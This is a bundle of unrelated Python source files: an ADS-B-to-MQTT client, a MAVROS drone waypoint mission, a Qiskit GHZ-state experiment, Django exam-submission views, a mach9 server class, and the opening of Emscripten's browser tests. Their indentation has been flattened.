log.info("MQTT Disconnect: %s" % (str(rc)))
if not gQuitting:
while not mqttConnect():
time.sleep(10)
log.info("Attempting MQTT reconnect")
log.info("MQTT connected")
def mqttOnMessage(mosq, obj, msg):
try:
data = json.loads(msg.payload)
except Exception as e:
log.error("JSON load failed for '%s'", msg.payload)
proxyCheck(mosq, data)
def mqttOnPublish(mosq, obj, mid):
pass
def mqttOnSubscribe(mosq, obj, mid, granted_qos):
log.debug("Subscribed")
def mqttOnLog(mosq, obj, level, string):
log.debug("log:"+string)
def mqttThread():
global gQuitting
try:
mqttc.loop_forever()
gQuitting = True
log.info("MQTT thread exiting")
gQuitting = True
except Exception as e:
log.error("MQTT thread got exception: %s" % (e))
print(traceback.format_exc())
gQuitting = True
log.info("MQTT disconnect")
mqttc.disconnect();
def mqttConnect():
global args
global mqttc
try:
mqttc = mosquitto.Mosquitto("adsbclient-%d" % (random.randint(0, 65535)))
mqttc.on_message = mqttOnMessage
mqttc.on_connect = mqttOnConnect
mqttc.on_disconnect = mqttOnDisconnect
mqttc.on_publish = mqttOnPublish
mqttc.on_subscribe = mqttOnSubscribe
if args.mqtt_user and args.mqtt_password:
mqttc.username_pw_set(args.mqtt_user, password = args.mqtt_password)
mqttc.connect(args.mqtt_host, args.mqtt_port, 60)
thread = threading.Thread(target = mqttThread)
thread.setDaemon(True)
thread.start()
return True
except socket.error as e:
return False
log.info("MQTT wierdness")
def loggingInit(level, log_host):
log = logging.getLogger(__name__)
# Initialize remote logging
logger = logging.getLogger()
logger.setLevel(level)
if log_host != None:
remotelogger.init(logger = logger, appName = "adsbclient", subSystem = None, host = log_host, level = logging.DEBUG)
if 1:
# Log to stdout
ch = logging.StreamHandler(sys.stdout)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
ch.setFormatter(formatter)
logger.addHandler(ch)
def signal_handler(signal, frame):
global gQuitting
global mqttc
log.info("Quitting due to ctrl-c")
gQuitting = True
mqttc.disconnect();
sys.exit(0)
def adsbThread():
global gQuitting
global mqttc
global args
sock = None
connWarn = False
observations = {}
socketTimeoutSec = 5
cleanIntervalSec = 5
cleanTimeoutSec = 30 # Clean observations when we have no updates in this time
if args.basestationdb:
gPlaneDBs.append(icao24.PlaneDB(args.basestationdb))
if args.myplanedb:
gPlaneDBs.append(icao24.PlaneDB(args.myplanedb))
lastClean = datetime.datetime.utcnow()
nextClean = datetime.datetime.utcnow() + datetime.timedelta(seconds=cleanIntervalSec)
while 1:
if sock == None:
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((args.dump1090_host, args.dump1090_port))
log.info("ADSB connected")
sock.settimeout(socketTimeoutSec)
connWarn = False
except socket.error as e:
if not connWarn:
logging.critical("Failed to connect to ADSB receiver on %s:%s, retrying : %s" % (args.dump1090_host, args.dump1090_port, e))
connWarn = True
sock = None
time.sleep(10)
else:
if datetime.datetime.utcnow() > nextClean:
observations = cleanObservations(observations, cleanTimeoutSec, mqttc)
lastClean = datetime.datetime.utcnow()
nextClean = datetime.datetime.utcnow() + datetime.timedelta(seconds=cleanIntervalSec)
try:
data = sock.recv(512)
except socket.error as e:
err = e.args[0]
if err == errno.EAGAIN or err == errno.EWOULDBLOCK:
logging.critical("No data available")
print('')
sock = None
time.sleep(10)
else:
logging.critical("Error occured : %s" % (e))
sock = None
time.sleep(10)
else:
m = sbs1.SBS1Message(data)
if m.isValid:
if m.icao24 in observations:
observations[m.icao24].update(m)
else:
observations[m.icao24] = Observation(m)
if observations[m.icao24].isPresentable() and observations[m.icao24].updated:
mqttc.publish("/adsb/%s/json" % args.radar_name, json.dumps(observations[m.icao24].dict()), 0, False) # Retain)
observations[m.icao24].updated = False
observations[m.icao24].dump()
def adsbConnect():
thread = threading.Thread(target = adsbThread)
thread.setDaemon(True)
thread.start()
def main():
global args
parser = argparse.ArgumentParser(description='This is my description')
parser.add_argument('-r', '--radar-name', help="name of radar, used as topic string /adsb/<radar>/json", default='radar')
parser.add_argument('-m', '--mqtt-host', help="MQTT broker hostname", default='127.0.0.1')
parser.add_argument('-p', '--mqtt-port', type=int, help="MQTT broker port number (default 1883)", default=1883)
parser.add_argument('-u', '--mqtt-user', help="MQTT broker user")
parser.add_argument('-a', '--mqtt-password', help="MQTT broker password")
parser.add_argument('-H', '--dump1090-host', help="dump1090 hostname", default='127.0.0.1')
parser.add_argument('-P', '--dump1090-port', type=int, help="dump1090 port number (default 30003)", default=30003)
parser.add_argument('-v', '--verbose', action="store_true", help="Verbose output")
parser.add_argument('-bdb', '--basestationdb', help="BaseStation SQLite DB (download from http://planebase.biz/bstnsqb)")
parser.add_argument('-mdb', '--myplanedb', help="Your own SQLite DB with the same structure as BaseStation.sqb where you can add planes missing from BaseStation db")
parser.add_argument('-l', '--logger', dest='log_host', help="Remote log host")
args = parser.parse_args()
signal.signal(signal.SIGINT, signal_handler)
if args.verbose:
loggingInit(logging.DEBUG, args.log_host)
else:
loggingInit(logging.INFO, args.log_host)
mqttConnect()
adsbConnect()
numThreads = threading.active_count()
while numThreads == threading.active_count():
time.sleep(0.1)
log.critical("Exiting")
# Ye ol main
main()
|
navigation.py | import rospy
import glob
import json
import math
import os
import px4tools
import sys
import time
import actionlib
import roslaunch
import numpy as np
from mavros import mavlink
from mavros import action_server
from mavros_msgs.msg import Mavlink, Waypoint, WaypointReached, GlobalPositionTarget, State, TakeoffAction, TakeoffGoal, LandAction, LandGoal, WaypointsAction, WaypointsGoal, HomePosition
from mavros_msgs.srv import CommandBool, SetMode, CommandTOL, WaypointPush, WaypointClear, CommandHome
from sensor_msgs.msg import NavSatFix
from geometry_msgs.msg import PoseStamped
from mavros_test_common import MavrosTestCommon
from pymavlink import mavutil
from threading import Thread
# Brings in the SimpleActionClient
import actionlib
class offboard():
def state_callback(self, data):
self.state = data
def wp_reached_callback(self, data):
self.wp_reached = data
def home_pos_callback(self, data):
self.home_pos = data
#print(self.home_pos.geo)
def global_pos_callback(self, data):
self.global_pos = data
def __init__(self):
rospy.init_node('guidance_node', anonymous=True)
state_sub = rospy.Subscriber('mavros/state', State, self.state_callback)
self.state = State
#PUBLISHERS
local_pos_pub = rospy.Publisher('mavros/setpoint_position/local', PoseStamped, queue_size=10)
#global_pos_pub = rospy.Publisher('mavros/setpoint_position/global', GlobalPositionTarget, queue_size=10)
local_pos_sub = rospy.Subscriber('/mavros/global_position/global', NavSatFix, self.global_pos_callback)
home_pos_sub = rospy.Subscriber('/mavros/home_position/home', HomePosition, self.home_pos_callback)
#ACTIONS
#init actionlib servers
server = Thread(target=action_server.ActionServer)
server.setDaemon(True)
server.start()
takeoff_client = actionlib.SimpleActionClient('takeoff', TakeoffAction)
land_client = actionlib.SimpleActionClient('land', LandAction)
waypoints_client = actionlib.SimpleActionClient('waypoints', WaypointsAction)
# need to simulate heartbeat to prevent datalink loss detection
hb_mav_msg = mavutil.mavlink.MAVLink_heartbeat_message(mavutil.mavlink.MAV_TYPE_GCS, 0, 0, 0, 0, 0)
hb_mav_msg.pack(mavutil.mavlink.MAVLink('', 2, 1))
hb_ros_msg = mavlink.convert_to_rosmsg(hb_mav_msg)
hb_thread = Thread(target=self.send_heartbeat, args=(hb_ros_msg))
hb_thread.setDaemon(True)
#PREFLIGHT CHECK
rate = rospy.Rate(30)
while (not self.state.connected):
print('Waiting on Connection')
rate.sleep()
print('Connected')
time.sleep(5)
goal = TakeoffGoal()
goal.height = 22
print('Actionlib started')
takeoff_client.send_goal(goal)
takeoff_client.wait_for_result()
#1: Hold Hold time. (ignored by fixed wing, time to stay at waypoint for rotary wing) min:0 s
#2: Accept Radius Acceptance radius (if the sphere with this radius is hit, the waypoint counts as reached) min:0 m
#3: Pass Radius 0 to pass through the WP, if > 0 radius to pass by WP. Positive value for clockwise orbit, negative value for counter-clockwise orbit.
#4: Yaw Desired yaw angle (deg) at waypoint (rotary wing). NaN to use the current system yaw heading mode (e.g. yaw towards next waypoint, yaw to home, etc.).
#5: Latitude Latitude
#6: Longitude Longitude
#7: Altitude Altitude
wps = []
wp1 = Waypoint()
wp2 = Waypoint()
wp3 = Waypoint()
wp4 = Waypoint()
wp5 = Waypoint()
wp6 = Waypoint()
wp7 = Waypoint()
wp8 = Waypoint()
wp9 = Waypoint()
wp10 = Waypoint()
wp11 = Waypoint()
wp12 = Waypoint()
wp1.command = 16
#wp1.param4 = np.nan
wp1.x_lat = 40.00482126
wp1.y_long = 100.0100724
wp1.z_alt = 22
wp1.autocontinue = True
wp2.command = 16
#wp3.param4 = np.nan
wp2.x_lat = 40.00422467
wp2.y_long = 100.0122255
wp2.z_alt = 22
wp2.autocontinue = True
wp3.command = 16
#wp3.param4 = np.nan
wp3.x_lat = 40.00443838
wp3.y_long = 100.0123931
wp3.z_alt = 22
wp3.autocontinue = True
wp4.command = 16
#wp4.param4 = np.nan
wp4.x_lat = 40.00515832
wp4.y_long = 100.0103007
wp4.z_alt = 22
wp4.autocontinue = True
wp5.command = 16
#wp5.param4 = np.nan
wp5.x_lat = 40.00549537
wp5.y_long = 100.010529
wp5.z_alt = 22
wp5.autocontinue = True
wp6.command = 16
#wp6.param4 = np.nan
wp6.x_lat = 40.0046521
wp6.y_long = 100.0125607
wp6.z_alt = 22
wp6.autocontinue = True
wp7.command = 16
#wp7.param4 = np.nan
wp7.x_lat = 40.00489078
wp7.y_long = 100.0127564
wp7.z_alt = 22
wp7.autocontinue = True
wp8.command = 16
#wp8.param4 = np.nan
wp8.x_lat = 40.00573685
wp8.y_long = 100.0106538
wp8.z_alt = 22
wp8.autocontinue = True
wp9.command = 16
#wp9.param4 = np.nan
wp9.x_lat = 40.00597832
wp9.y_long = 100.0107787
wp9.z_alt = 22
wp9.autocontinue = True
wp10.command = 16
#wp10.param4 = np.nan
wp10.x_lat = 40.00512946
wp10.y_long = 100.0129521
wp10.z_alt = 22
wp10.autocontinue = True
wp11.command = 16
#wp11.param4 = np.nan
wp11.x_lat = 40.00536815
wp11.y_long = 100.0131477
wp11.z_alt = 22
wp11.autocontinue = True
wp12.command = 16
#wp12.param4 = np.nan
wp12.x_lat = 40.00621979
wp12.y_long = 100.0109035
wp12.z_alt = 22
wp12.autocontinue = True
goal = WaypointsGoal()
goal.waypoints.append(wp1)
goal.waypoints.append(wp2)
goal.waypoints.append(wp3)
goal.waypoints.append(wp4)
goal.waypoints.append(wp5)
goal.waypoints.append(wp6)
goal.waypoints.append(wp7)
goal.waypoints.append(wp8)
goal.waypoints.append(wp9)
goal.waypoints.append(wp10)
goal.waypoints.append(wp11)
goal.waypoints.append(wp12)
print(goal)
waypoints_client.send_goal(goal)
waypoints_client.wait_for_result(rospy.Duration.from_sec(800.0))
time.sleep(5)
goal = LandGoal()
goal.x_lat = self.home_pos.geo.latitude
goal.y_long = self.home_pos.geo.longitude
goal.z_alt = 0.0
print('Actionlib started')
land_client.send_goal(goal)
land_client.wait_for_result(rospy.Duration.from_sec(30.0))
sys.exit()
# Heartbeat must be sent to px4 at 2Hz or else auto disconnect
def send_heartbeat(self, hb_ros_msg):
rate = rospy.Rate(2) # Hz
while not rospy.is_shutdown():
self.mavlink_pub.publish(hb_ros_msg)
try: # prevent garbage in console output when thread is killed
rate.sleep()
except rospy.ROSInterruptException:
pass
if __name__ == '__main__':
offboard()
|
compare_num_layer_ghz_multiprocessing_adam.py | import qiskit
import numpy as np
import sys
import multiprocessing
sys.path.insert(1, '../')
import qtm.base, qtm.constant, qtm.nqubit, qtm.fubini_study, qtm.encoding
import importlib
importlib.reload(qtm.base)
importlib.reload(qtm.constant)
importlib.reload(qtm.onequbit)
importlib.reload(qtm.nqubit)
# Init parameters
# For arbitrary initial state
def run_ghz(num_layers, num_qubits):
# GHZ
theta = np.pi/3
thetas = np.ones(num_qubits*num_layers*5)
qc = qiskit.QuantumCircuit(num_qubits, num_qubits)
loss_values_ghz = []
thetass_ghz = []
for i in range(0, 400):
# fubini_study for linear_state is same for linear state
if i % 20 == 0:
print('GHZ (' + str(num_layers) + ' layer): ', i)
# G = qtm.fubini_study.calculate_linear_state(qc.copy(), thetas, num_layers)
grad_loss = qtm.base.grad_loss(
qc,
qtm.nqubit.create_GHZchecker_linear,
thetas, num_layers = num_layers, theta = theta)
# grad1 = np.real(np.linalg.inv(G) @ grad_loss)
if i == 0:
m, v = list(np.zeros(thetas.shape[0])), list(np.zeros(thetas.shape[0]))
thetas = qtm.base.adam(thetas, m, v, i, grad_loss)
qc_copy = qtm.nqubit.create_GHZchecker_linear(qc.copy(), thetas, num_layers, theta)
loss = qtm.base.loss_basis(qtm.base.measure(qc_copy, list(range(qc_copy.num_qubits))))
loss_values_ghz.append(loss)
thetass_ghz.append(thetas)
traces_ghz, fidelities_ghz = [], []
for thetas in thetass_ghz:
# Get |psi> = U_gen|000...>
qc = qiskit.QuantumCircuit(num_qubits, num_qubits)
qc = qtm.nqubit.create_linear_state(qc, thetas, num_layers = num_layers)
psi , rho_psi = qtm.base.extract_state(qc)
# Get |psi~> = U_target|000...>
qc1 = qiskit.QuantumCircuit(num_qubits, num_qubits)
qc1 = qtm.nqubit.create_ghz_state(qc1, theta = theta)
psi_hat , rho_psi_hat = qtm.base.extract_state(qc1)
# Calculate the metrics
trace, fidelity = qtm.base.get_metrics(psi, psi_hat)
traces_ghz.append(trace)
fidelities_ghz.append(fidelity)
# Plot loss value in 100 steps
print('Writting ...')
np.savetxt("../../experiments/linear_ansatz_15layer_adam/" + str(num_layers) + "/loss_values_ghz.csv", loss_values_ghz, delimiter=",")
np.savetxt("../../experiments/linear_ansatz_15layer_adam/" + str(num_layers) + "/thetass_ghz.csv", thetass_ghz, delimiter=",")
np.savetxt("../../experiments/linear_ansatz_15layer_adam/" + str(num_layers) + "/traces_ghz.csv", traces_ghz, delimiter=",")
np.savetxt("../../experiments/linear_ansatz_15layer_adam/" + str(num_layers) + "/fidelities_ghz.csv", fidelities_ghz, delimiter=",")
if __name__ == "__main__":
# creating thread
num_qubits = 5
num_layers = [1,2,3,4,5]
t_ghz = []
for i in num_layers:
t_ghz.append(multiprocessing.Process(target = run_ghz, args=(i, num_qubits)))
for i in range(0, len(num_layers)):
t_ghz[i].start()
for i in range(0, len(num_layers)):
t_ghz[i].join()
print("Done!") |
lecturer.py | from django.shortcuts import render, get_object_or_404
from django.http import HttpResponseRedirect
from django.contrib import messages
from django.contrib.auth.decorators import user_passes_test
from django.core.paginator import Paginator
from django.conf import settings
from django.core.mail import EmailMessage
from django.template.loader import render_to_string
from threading import Thread
from main_app.sender import *
from main_app.forms.lecturer import *
from main_app.models import Submission, Section
@user_passes_test(lambda u: u.Ins_ID.section_set.exists())
def home_view(request):
return render(request, 'lecturer/home.html')
############################################################# Start Functions #############################################################
@user_passes_test(lambda u: u.Ins_ID.section_set.exists())
def submit_exam_view(request):
sections = Section.objects.filter(
Ins_ID=request.user.Ins_ID,
).order_by('E_ID__Date')
paginator = Paginator(sections, 10)
section_pages = request.GET.get('page')
sections = paginator.get_page(section_pages)
context = {
'sections': sections,
}
return render(request, 'lecturer/SubmitExam.html', context)
@user_passes_test(lambda u: u.Ins_ID.section_set.exists())
def redirect_submit_exam(request, pk):
section = get_object_or_404(Section, pk=pk, Ins_ID=request.user.Ins_ID)
form = SubmitExamForm(request.POST)
request.session['typesOfCalc'] = None
request.session['notes'] = None
context = {
'section': section,
'form': form,
}
if request.method == 'POST':
if form.is_valid():
request.session['noModels'] = form.cleaned_data['noModels']
request.session['noOfPapers'] = form.cleaned_data['noOfPapers']
request.session['noOfDN'] = form.cleaned_data['noOfDN']
request.session['typesOfCalc'] = form.cleaned_data['typesOfCalc']
request.session['notes'] = form.cleaned_data['notes']
submission = Submission(
Ins_ID = request.user.Ins_ID,
ID = section,
)
submission.save()
return HttpResponseRedirect(f'/lecturer/SubmitExam/Form/{pk}')
return render(request, 'lecturer/cud/RedirectSubmitExam.html', context)
@user_passes_test(lambda u: u.Ins_ID.section_set.exists())
def submit_exam_form(request, pk):
noModels = request.session.get('noModels')
noOfPapers = request.session.get('noOfPapers')
typesOfCalc = request.session.get('typesOfCalc')
noOfDN = request.session.get('noOfDN')
notes = request.session.get('notes')
section = get_object_or_404(Section, pk=pk, Ins_ID=request.user.Ins_ID)
context = {
'section': section,
'noModels': noModels,
'noOfPapers': noOfPapers,
'typesOfCalc': typesOfCalc,
'noOfDN': noOfDN,
'notes': notes,
}
html = render_to_string('lecturer/forms/CoverForm.html', context)
thread = Thread(target=pdf_mail, args=(html, 'coverform', [request.user.Ins_ID.Email]))
thread.start()
return render(request, 'lecturer/forms/CoverForm.html', context)
@user_passes_test(lambda u: u.Ins_ID.section_set.exists())
def confirm_delivering_view(request):
submitted = Submission.objects.filter(
Ins_ID=request.user.Ins_ID,
).order_by('D_Status')
paginator = Paginator(submitted, 10)
submitted_page = request.GET.get('page')
submitted = paginator.get_page(submitted_page)
context = {
'submitted': submitted,
}
return render(request, 'lecturer/ConfirmDelivering.html', context)
@user_passes_test(lambda u: u.Ins_ID.section_set.exists())
def confirm_delivering(request, pk):
submission = get_object_or_404(
Submission, pk=pk, Ins_ID=request.user.Ins_ID)
context = {
'submission': submission,
}
if request.method == 'POST':
submission.D_Status = True
submission.save()
message = """
Exam : ({}) has been confirmed delivering by: ({})
Examination Control Committee""".format(submission.ID.CCourse.CoName, submission.Ins_ID)
mail_thread = Thread(target=send_mail, args=(message, [submission.Member_ID.Email]))
mail_thread.start()
# sms_thread = Thread(target=send_sms, args=(message,))
# sms_thread.start()
messages.success(request, 'Successfully confirmed delivering')
return HttpResponseRedirect('/lecturer/ConfirmDelivering')
return render(request, 'lecturer/cud/ConfirmDeliver.html', context)
@user_passes_test(lambda u: u.Ins_ID.section_set.exists())
def remove_submission(request, pk):
submitted = get_object_or_404(
Submission, pk=pk, Ins_ID=request.user.Ins_ID)
context = {
'submitted': submitted,
}
if request.method == 'POST':
if not submitted.S_Status:
submitted.delete()
messages.success(request, 'Successfully remove submission')
else:
messages.error(request, 'You can not remove!')
return HttpResponseRedirect('/lecturer/ConfirmDelivering')
return render(request, 'lecturer/cud/RemoveSubmission.html', context)
############################################################# End Functions #############################################################
|
server.py | import asyncio
import logging
import os
import uvloop
from functools import partial
from inspect import isawaitable
from multiprocessing import Process
from ssl import create_default_context, Purpose
from signal import (
SIGTERM, SIGINT,
signal as signal_func,
Signals
)
from socket import (
socket,
SOL_SOCKET,
SO_REUSEADDR,
)
from mach9.http import HttpProtocol
from mach9.signal import Signal
from mach9.timer import update_current_time
class Server:
def __init__(self, app):
self.app = app
self.request_handler = app
self.signal = Signal()
self.log = app.log
self.log_config = app.log_config
self.listeners = app.listeners
self.debug = app.debug
self.netlog = app.netlog
self.request_timeout = app.request_timeout
self.request_max_size = app.request_max_size
self.keep_alive = app.keep_alive
def get_server_setting(self, protocol, host='127.0.0.1', port=8000,
debug=False, ssl=None, sock=None, workers=1,
loop=None, backlog=100, has_log=True):
'''Helper function used by `run`.'''
if isinstance(ssl, dict):
# try common aliaseses
cert = ssl.get('cert') or ssl.get('certificate')
key = ssl.get('key') or ssl.get('keyfile')
if cert is None or key is None:
raise ValueError('SSLContext or certificate and key required.')
context = create_default_context(purpose=Purpose.CLIENT_AUTH)
context.load_cert_chain(cert, keyfile=key)
ssl = context
server_settings = {
'protocol': protocol,
'request_handler': self.request_handler,
'log': self.log,
'netlog': self.netlog,
'host': host,
'port': port,
'sock': sock,
'ssl': ssl,
'signal': self.signal,
'debug': debug,
'request_timeout': self.request_timeout,
'request_max_size': self.request_max_size,
'keep_alive': self.keep_alive,
'loop': loop,
'backlog': backlog,
'has_log': has_log
}
for event_name, settings_name, reverse in (
('before_server_start', 'before_start', False),
('after_server_start', 'after_start', False),
('before_server_stop', 'before_stop', True),
('after_server_stop', 'after_stop', True),
):
listeners = self.listeners[event_name].copy()
if reverse:
listeners.reverse()
# Prepend mach9 to the arguments when listeners are triggered
listeners = [partial(listener, self.app) for listener in listeners]
server_settings[settings_name] = listeners
if debug:
self.log.setLevel(logging.DEBUG)
# Serve
if host and port:
proto = 'http'
if ssl is not None:
proto = 'https'
self.log.info('Goin\' Fast @ {}://{}:{}'.format(proto, host, port))
return server_settings
def run(self, host='127.0.0.1', port=8000, ssl=None,
sock=None, workers=1, backlog=100, protocol=None):
protocol = protocol or HttpProtocol
server_settings = self.get_server_setting(
protocol, host=host, port=port, debug=self.debug, ssl=ssl,
sock=sock, workers=workers, backlog=backlog,
has_log=self.log_config is not None)
try:
if workers == 1:
self.serve(**server_settings)
else:
self.serve_multiple(server_settings, workers)
except:
self.log.exception(
'Experienced exception while trying to serve')
self.log.info('Server Stopped')
def trigger_events(self, events, loop):
"""Trigger event callbacks (functions or async)
:param events: one or more sync or async functions to execute
:param loop: event loop
"""
for event in events:
result = event(loop)
if isawaitable(result):
loop.run_until_complete(result)
def serve(self, host, port, request_handler,
before_start=None,
after_start=None, before_stop=None, after_stop=None, debug=False,
request_timeout=60, ssl=None, sock=None, request_max_size=None,
reuse_port=False, loop=None, protocol=None, backlog=100,
connections=None, signal=None, has_log=True, keep_alive=True,
log=None, netlog=None):
self.loop = loop = uvloop.new_event_loop()
asyncio.set_event_loop(loop)
if debug:
loop.set_debug(debug)
self.trigger_events(before_start, loop)
connections = connections if connections is not None else set()
server = partial(
protocol,
loop=loop,
connections=connections,
signal=signal,
request_handler=request_handler,
request_timeout=request_timeout,
request_max_size=request_max_size,
has_log=has_log,
keep_alive=keep_alive,
log=log,
netlog=netlog
)
server_coroutine = loop.create_server(
server,
host,
port,
ssl=ssl,
reuse_port=reuse_port,
sock=sock,
backlog=backlog
)
# Instead of pulling time at the end of every request,
# pull it once per minute
loop.call_soon(partial(update_current_time, loop))
try:
http_server = loop.run_until_complete(server_coroutine)
except:
log.exception("Unable to start server")
return
self.trigger_events(after_start, loop)
# Register signals for graceful termination
for _signal in (SIGINT, SIGTERM):
try:
loop.add_signal_handler(_signal, loop.stop)
except NotImplementedError:
log.warn('Mach9 tried to use loop.add_signal_handler but it is'
' not implemented on this platform.')
pid = os.getpid()
try:
log.info('Starting worker [{}]'.format(pid))
loop.run_forever()
finally:
log.info("Stopping worker [{}]".format(pid))
# Run the on_stop function if provided
self.trigger_events(before_stop, loop)
# Wait for event loop to finish and all connections to drain
http_server.close()
loop.run_until_complete(http_server.wait_closed())
# Complete all tasks on the loop
signal.stopped = True
for connection in connections:
connection.close_if_idle()
while connections:
loop.run_until_complete(asyncio.sleep(0.1))
self.trigger_events(after_stop, loop)
loop.close()
def serve_multiple(self, server_settings, workers):
server_settings['reuse_port'] = True
# Handling when custom socket is not provided.
if server_settings.get('sock') is None:
sock = socket()
sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
sock.bind((server_settings['host'], server_settings['port']))
sock.set_inheritable(True)
server_settings['sock'] = sock
server_settings['host'] = None
server_settings['port'] = None
log = server_settings['log']
def sig_handler(signal, frame):
log.info("Received signal {}. Shutting down.".format(
Signals(signal).name))
for process in processes:
os.kill(process.pid, SIGINT)
signal_func(SIGINT, lambda s, f: sig_handler(s, f))
signal_func(SIGTERM, lambda s, f: sig_handler(s, f))
processes = []
for _ in range(workers):
process = Process(target=self.serve, kwargs=server_settings)
process.daemon = True
process.start()
processes.append(process)
for process in processes:
process.join()
# the above processes will block this until they're stopped
for process in processes:
process.terminate()
server_settings.get('sock').close()
def stop(self):
self.loop.stop()
|
test_browser.py | # coding=utf-8
# Copyright 2013 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
from __future__ import print_function
import argparse
import json
import multiprocessing
import os
import random
import re
import shlex
import shutil
import subprocess
import time
import unittest
import webbrowser
import zlib
from runner import BrowserCore, path_from_root, has_browser, EMTEST_BROWSER, no_wasm_backend, flaky
from tools import system_libs
from tools.shared import PYTHON, EMCC, WINDOWS, FILE_PACKAGER, PIPE, SPIDERMONKEY_ENGINE, JS_ENGINES
from tools.shared import try_delete, Building, run_process, run_js
try:
from http.server import BaseHTTPRequestHandler, HTTPServer
except ImportError:
# Python 2 compatibility
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
def test_chunked_synchronous_xhr_server(support_byte_ranges, chunkSize, data, checksum, port):
class ChunkedServerHandler(BaseHTTPRequestHandler):
def sendheaders(s, extra=[], length=len(data)):
s.send_response(200)
s.send_header("Content-Length", str(length))
s.send_header("Access-Control-Allow-Origin", "http://localhost:%s" % port)
s.send_header("Access-Control-Expose-Headers", "Content-Length, Accept-Ranges")
s.send_header("Content-type", "application/octet-stream")
if support_byte_ranges:
s.send_header("Accept-Ranges", "bytes")
for i in extra:
s.send_header(i[0], i[1])
s.end_headers()
def do_HEAD(s):
s.sendheaders()
def do_OPTIONS(s):
s.sendheaders([("Access-Control-Allow-Headers", "Range")], 0)
def do_GET(s):
if not support_byte_ranges:
s.sendheaders()
s.wfile.write(data)
else:
start, end = s.headers.get("range").split("=")[1].split("-")
start = int(start)
end = int(end)
end = min(len(data) - 1, end)
length = end - start + 1
s.sendheaders([], length)
s.wfile.write(data[start:end + 1])
# CORS preflight makes OPTIONS requests which we need to account for.
expectedConns = 22
httpd = HTTPServer(('localhost', 11111), ChunkedServerHandler)
for i in range(expectedConns + 1):
httpd.handle_request()
def shell_with_script(shell_file, output_file, replacement):
with open(path_from_root('src', shell_file)) as input:
with open(output_file, 'w') as output:
output.write(input.read().replace('{{{ SCRIPT }}}', replacement))
def is_chrome():
return EMTEST_BROWSER and 'chrom' in EMTEST_BROWSER.lower()
def no_chrome(note='chome is not supported'):
if is_chrome():
return unittest.skip(note)
return lambda f: f
def no_swiftshader(f):
def decorated(self):
if is_chrome() and '--use-gl=swiftshader' in EMTEST_BROWSER:
self.skipTest('not compatible with swiftshader')
return f(self)
return decorated
requires_graphics_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_GRAPHICS_HARDWARE'), "This test requires graphics hardware")
requires_sound_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_SOUND_HARDWARE'), "This test requires sound hardware")
requires_threads = unittest.skipIf(os.environ.get('EMTEST_LACKS_THREAD_SUPPORT'), "This test requires thread support")
requires_sync_compilation = unittest.skipIf(is_chrome(), "This test requires synchronous compilation, which does not work in Chrome (except for tiny wasms)")
class browser(BrowserCore):
@classmethod
def setUpClass(self):
super(browser, self).setUpClass()
self.browser_timeout = 20
print()
print('Running the browser tests. Make sure the browser allows popups from localhost.')
print()
def test_sdl1_in_emscripten_nonstrict_mode(self):
if 'EMCC_STRICT' in os.environ and int(os.environ['EMCC_STRICT']):
self.skipTest('This test requires being run in non-strict mode (EMCC_STRICT env. variable unset)')
# TODO: This test is verifying behavior that will be deprecated at some point in the future, remove this test once
# system JS libraries are no longer automatically linked to anymore.
self.btest('hello_world_sdl.cpp', reference='htmltest.png')
def test_sdl1(self):
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-lSDL', '-lGL'])
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-s', 'USE_SDL=1', '-lGL']) # is the default anyhow
# Deliberately named as test_zzz_* to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
def test_zzz_html_source_map(self):
if not has_browser():
self.skipTest('need a browser')
cpp_file = os.path.join(self.get_dir(), 'src.cpp')
html_file = os.path.join(self.get_dir(), 'src.html')
# browsers will try to 'guess' the corresponding original line if a
# generated line is unmapped, so if we want to make sure that our
# numbering is correct, we need to provide a couple of 'possible wrong
# answers'. thus, we add some printf calls so that the cpp file gets
# multiple mapped lines. in other words, if the program consists of a
# single 'throw' statement, browsers may just map any thrown exception to
# that line, because it will be the only mapped line.
with open(cpp_file, 'w') as f:
f.write(r'''
#include <cstdio>
int main() {
printf("Starting test\n");
try {
throw 42; // line 8
} catch (int e) { }
printf("done\n");
return 0;
}
''')
# use relative paths when calling emcc, because file:// URIs can only load
# sourceContent when the maps are relative paths
try_delete(html_file)
try_delete(html_file + '.map')
run_process([PYTHON, EMCC, 'src.cpp', '-o', 'src.html', '-g4', '-s', 'WASM=0'], cwd=self.get_dir())
assert os.path.exists(html_file)
assert os.path.exists(html_file + '.map')
webbrowser.open_new('file://' + html_file)
print('''
If manually bisecting:
Check that you see src.cpp among the page sources.
Even better, add a breakpoint, e.g. on the printf, then reload, then step
through and see the print (best to run with EMTEST_SAVE_DIR=1 for the reload).
''')
def test_emscripten_log(self):
# TODO: wasm support for source maps
src = os.path.join(self.get_dir(), 'src.cpp')
open(src, 'w').write(self.with_report_result(open(path_from_root('tests', 'emscripten_log', 'emscripten_log.cpp')).read()))
run_process([PYTHON, EMCC, src, '--pre-js', path_from_root('src', 'emscripten-source-map.min.js'), '-g', '-o', 'page.html', '-s', 'DEMANGLE_SUPPORT=1', '-s', 'WASM=0'])
self.run_browser('page.html', None, '/report_result?1')
def build_native_lzma(self):
lzma_native = path_from_root('third_party', 'lzma.js', 'lzma-native')
if os.path.isfile(lzma_native) and os.access(lzma_native, os.X_OK):
return
cwd = os.getcwd()
try:
os.chdir(path_from_root('third_party', 'lzma.js'))
# On Windows prefer using MinGW make if it exists, otherwise fall back to hoping we have cygwin make.
if WINDOWS and Building.which('mingw32-make'):
run_process(['doit.bat'])
else:
run_process(['sh', './doit.sh'])
finally:
os.chdir(cwd)
def test_preload_file(self):
absolute_src_path = os.path.join(self.get_dir(), 'somefile.txt').replace('\\', '/')
open(absolute_src_path, 'w').write('''load me right before running the code please''')
absolute_src_path2 = os.path.join(self.get_dir(), '.somefile.txt').replace('\\', '/')
open(absolute_src_path2, 'w').write('''load me right before running the code please''')
absolute_src_path3 = os.path.join(self.get_dir(), 'some@file.txt').replace('\\', '/')
open(absolute_src_path3, 'w').write('''load me right before running the code please''')
